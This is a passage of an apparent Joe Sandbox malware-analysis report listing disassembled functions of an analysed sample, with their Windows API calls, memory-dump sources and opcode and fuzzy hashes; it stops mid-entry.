                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFile$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2643169976-0
                                                                                                                        • Opcode ID: 81546d272bb69f96ffd0ee2b73c29c8e82e6d083e8738d1cf9641ad59dfc80a7
                                                                                                                        • Instruction ID: 8f46c54d3de4435ef2f05c12d1205f9bee28d9e1927d13d70709d8e6f8de1866
                                                                                                                        • Opcode Fuzzy Hash: 81546d272bb69f96ffd0ee2b73c29c8e82e6d083e8738d1cf9641ad59dfc80a7
                                                                                                                        • Instruction Fuzzy Hash: DBE092325402096BDF115F61EC46FD9379CBF0C385F484031B944F6060EB62DE89DA60
                                                                                                                        Function 00EAAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,00EC2641,000000FF), ref: 00EAACB0
                                                                                                                        • CoUninitialize.COMBASE(?,?,?,?,00EC2641,000000FF), ref: 00EAACB5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GdiplusShutdownUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3856339756-0
                                                                                                                        • Opcode ID: 398eb028d7fc2e4152a1242ad51d2e20aab947fcca28f1037080336b363e5bfd
                                                                                                                        • Instruction ID: ef60fc8505f6eb397acbae6229c7174888a40c0885f69bc4c5577daa826102b2
                                                                                                                        • Opcode Fuzzy Hash: 398eb028d7fc2e4152a1242ad51d2e20aab947fcca28f1037080336b363e5bfd
                                                                                                                        • Instruction Fuzzy Hash: 5DE06572544650EFCB10DB5DDD06F45FBA8FB89B20F00426AF416E3760CB746801CA90
                                                                                                                        Function 00E9A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00E9A23A,?,00E9755C,?,?,?,?), ref: 00E9A254
                                                                                                                          • Part of subcall function 00E9BB03: _wcslen.LIBCMT ref: 00E9BB27
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00E9A23A,?,00E9755C,?,?,?,?), ref: 00E9A280
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2673547680-0
                                                                                                                        • Opcode ID: c0f42bd8106d6d7b9834470f422e0afa0e83bfd5e7156174ea43fb7a59c3cead
                                                                                                                        • Instruction ID: 031baf77328802fb0d8df85c8dc2b51614a327dc37cc20ba45babd3e2c2cf8b7
                                                                                                                        • Opcode Fuzzy Hash: c0f42bd8106d6d7b9834470f422e0afa0e83bfd5e7156174ea43fb7a59c3cead
                                                                                                                        • Instruction Fuzzy Hash: 33E092325001246BCF20AB68DC05BD9B798AB083E5F044271FD44F32A4D771DE45CAE0
                                                                                                                        Function 00EADEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _swprintf.LIBCMT ref: 00EADEEC
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                        • SetDlgItemTextW.USER32(00000065,?), ref: 00EADF03
                                                                                                                          • Part of subcall function 00EAB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EAB579
                                                                                                                          • Part of subcall function 00EAB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EAB58A
                                                                                                                          • Part of subcall function 00EAB568: IsDialogMessageW.USER32(0001043A,?), ref: 00EAB59E
                                                                                                                          • Part of subcall function 00EAB568: TranslateMessage.USER32(?), ref: 00EAB5AC
                                                                                                                          • Part of subcall function 00EAB568: DispatchMessageW.USER32(?), ref: 00EAB5B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2718869927-0
                                                                                                                        • Opcode ID: 1c678c74b460ecc8ae517ddc471927c9f0e133be47327764d55fdb0d8de624b3
                                                                                                                        • Instruction ID: 638cc92ce36cca84cc0a6535b68a17b2195e5c89772053bbed58541559f2d07a
                                                                                                                        • Opcode Fuzzy Hash: 1c678c74b460ecc8ae517ddc471927c9f0e133be47327764d55fdb0d8de624b3
                                                                                                                        • Instruction Fuzzy Hash: 84E09BB14002482ADF01A761DC06F9E3BAC9B05785F440492B204FA1A3DA74E6148661
                                                                                                                        Function 00EA081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EA0836
                                                                                                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E9F2D8,Crypt32.dll,00000000,00E9F35C,?,?,00E9F33E,?,?,?), ref: 00EA0858
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryLibraryLoadSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1175261203-0
                                                                                                                        • Opcode ID: 5a9360ab20098fa5911a5774b84f623f508cad3e63cbda158a0150ff8896ad3a
                                                                                                                        • Instruction ID: 2e9a625ba0e5da5cadcc9eb7084b6585eed3bbf34bfc3e7d977f2dd8a9705697
                                                                                                                        • Opcode Fuzzy Hash: 5a9360ab20098fa5911a5774b84f623f508cad3e63cbda158a0150ff8896ad3a
                                                                                                                        • Instruction Fuzzy Hash: 8AE01A768001686ADB11ABA5AC09FDA7BACAF0D391F044065B649F2144DA74EA858AB0
                                                                                                                        Function 00EAA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00EAA3DA
                                                                                                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00EAA3E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BitmapCreateFromGdipStream
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1918208029-0
                                                                                                                        • Opcode ID: 557fbbfb510b996d0fc03648b803b92f269001e5059ad3564b00ff2661010e5e
                                                                                                                        • Instruction ID: 8920aea560775119333ce068fb58367e0a3ad5ce9d7f076e979ea61930058896
                                                                                                                        • Opcode Fuzzy Hash: 557fbbfb510b996d0fc03648b803b92f269001e5059ad3564b00ff2661010e5e
                                                                                                                        • Instruction Fuzzy Hash: 03E0ED71500218EBCB20DF55C545B9DBBF8EB19364F10906AA846A7341E374BE04DBA1
                                                                                                                        Function 00EB2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EB2BAA
                                                                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00EB2BB5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1660781231-0
                                                                                                                        • Opcode ID: cdc9fda4a270329248af961d83f9dc910753db1ecfe353b02636f7de362cb449
                                                                                                                        • Instruction ID: bccfd75891942b31ed07bff55d934d91d7b0d3ab23ad882a8f4c32c8af93d346
                                                                                                                        • Opcode Fuzzy Hash: cdc9fda4a270329248af961d83f9dc910753db1ecfe353b02636f7de362cb449
                                                                                                                        • Instruction Fuzzy Hash: DDD0223925430918CC182EB0288F8DB37C5EE42BB87B0379EF320B54C1EF129040A021
                                                                                                                        Function 00E912F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3351165006-0
                                                                                                                        • Opcode ID: 5da1b3f3f332f406dadc506faa2b16d86fa6346d9362f1b3a8f9d4652d596192
                                                                                                                        • Instruction ID: 37f7c6d7aa8f3d5c9be919014e2c65b529d9429b5aa078e0be440a0a9270ba07
                                                                                                                        • Opcode Fuzzy Hash: 5da1b3f3f332f406dadc506faa2b16d86fa6346d9362f1b3a8f9d4652d596192
                                                                                                                        • Instruction Fuzzy Hash: BAC0123205C200BECB010BB5DC09C3BBBA8ABE5312F24C908B0A5D0061C238C114DB11
                                                                                                                        Function 00E91A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: bfcd13a20f24b33c75e52ae2cdab51913e7dac422494d65dcc68ca553047dbb0
                                                                                                                        • Instruction ID: dc6bc64c856e4bcf9c0dd7c90cc8f86e7ef364f3faddd492abe24fe05d671a22
                                                                                                                        • Opcode Fuzzy Hash: bfcd13a20f24b33c75e52ae2cdab51913e7dac422494d65dcc68ca553047dbb0
                                                                                                                        • Instruction Fuzzy Hash: BCC1C270A002569FEF19CF78C484BA97BE6EF05314F0821F9EC46AB392DB319945CB61
                                                                                                                        Function 00E93BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: 771d7dfcdf2288aacff1884dc335f54f0673370d39d463dca4ef345406b79657
                                                                                                                        • Instruction ID: d1d9d3ba6001e4b19de1b87afd9c27cd87b3b4b8e1b752232288f9405254d41e
                                                                                                                        • Opcode Fuzzy Hash: 771d7dfcdf2288aacff1884dc335f54f0673370d39d463dca4ef345406b79657
                                                                                                                        • Instruction Fuzzy Hash: 9671C071100B849EDF35DB70C8559EBF7E9AF15301F40196EE2ABA7241DA327A84CF21
                                                                                                                        Function 00E98284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E98289
                                                                                                                          • Part of subcall function 00E913DC: __EH_prolog.LIBCMT ref: 00E913E1
                                                                                                                          • Part of subcall function 00E9A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E9A598
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog$CloseFind
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2506663941-0
                                                                                                                        • Opcode ID: 014979825d24812e993b6b57cc6e1faac508fcc33820f25edd68a4101bfe3338
                                                                                                                        • Instruction ID: f0ae4eb567dca22f75e3105dfde6ff09519dc492f5319a1ed1d6a36fb50de308
                                                                                                                        • Opcode Fuzzy Hash: 014979825d24812e993b6b57cc6e1faac508fcc33820f25edd68a4101bfe3338
                                                                                                                        • Instruction Fuzzy Hash: 1641D6719446589ADF20EB60CD55AEAB3B8AF15304F0414FBE09AB70A3EB716FC4CB10
                                                                                                                        Function 00E913E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E913E1
                                                                                                                          • Part of subcall function 00E95E37: __EH_prolog.LIBCMT ref: 00E95E3C
                                                                                                                          • Part of subcall function 00E9CE40: __EH_prolog.LIBCMT ref: 00E9CE45
                                                                                                                          • Part of subcall function 00E9B505: __EH_prolog.LIBCMT ref: 00E9B50A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: a52008003fd99c8fb5f9beb36ee349f6fda2a49310fdf530494b649358620f5a
                                                                                                                        • Instruction ID: 7fbdcc5903ed7457b7caef3203ca165cd248a5613beccb28f4da7260e8b77455
                                                                                                                        • Opcode Fuzzy Hash: a52008003fd99c8fb5f9beb36ee349f6fda2a49310fdf530494b649358620f5a
                                                                                                                        • Instruction Fuzzy Hash: EF4179B0905B419EE724DF798885AE6FBE5BF19300F50492ED5FE97282CB312654CB10
                                                                                                                        Function 00E913DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E913E1
                                                                                                                          • Part of subcall function 00E95E37: __EH_prolog.LIBCMT ref: 00E95E3C
                                                                                                                          • Part of subcall function 00E9CE40: __EH_prolog.LIBCMT ref: 00E9CE45
                                                                                                                          • Part of subcall function 00E9B505: __EH_prolog.LIBCMT ref: 00E9B50A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: 86d0f52a216a6e0b630ec3f8e1f93efe5d5c427222944c233c3fff7fc6271b8f
                                                                                                                        • Instruction ID: 9add98d227652fadd8328e7df38feec37ca5a57383ca323ee349d8a442543e29
                                                                                                                        • Opcode Fuzzy Hash: 86d0f52a216a6e0b630ec3f8e1f93efe5d5c427222944c233c3fff7fc6271b8f
                                                                                                                        • Instruction Fuzzy Hash: 834167B0905B409EEB24DF798885AE7FBE5BF19300F50592ED5FE97282CB322654CB10
                                                                                                                        Function 00EAB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00EAB098
                                                                                                                          • Part of subcall function 00E913DC: __EH_prolog.LIBCMT ref: 00E913E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: a54e130f0548b444c5045fec60763b02bd3c16b5772b4dbe57243c874dd3a9db
                                                                                                                        • Instruction ID: ccb734531e383acc8771498e75cec2dbf262b516cce01ef2340ecac18edf0d3d
                                                                                                                        • Opcode Fuzzy Hash: a54e130f0548b444c5045fec60763b02bd3c16b5772b4dbe57243c874dd3a9db
                                                                                                                        • Instruction Fuzzy Hash: 94318D75C01249EECF15DF68C9519EEBBF4AF1A304F10549EE409BB242D735AE04CB61
                                                                                                                        Function 00EBAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EBACF8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
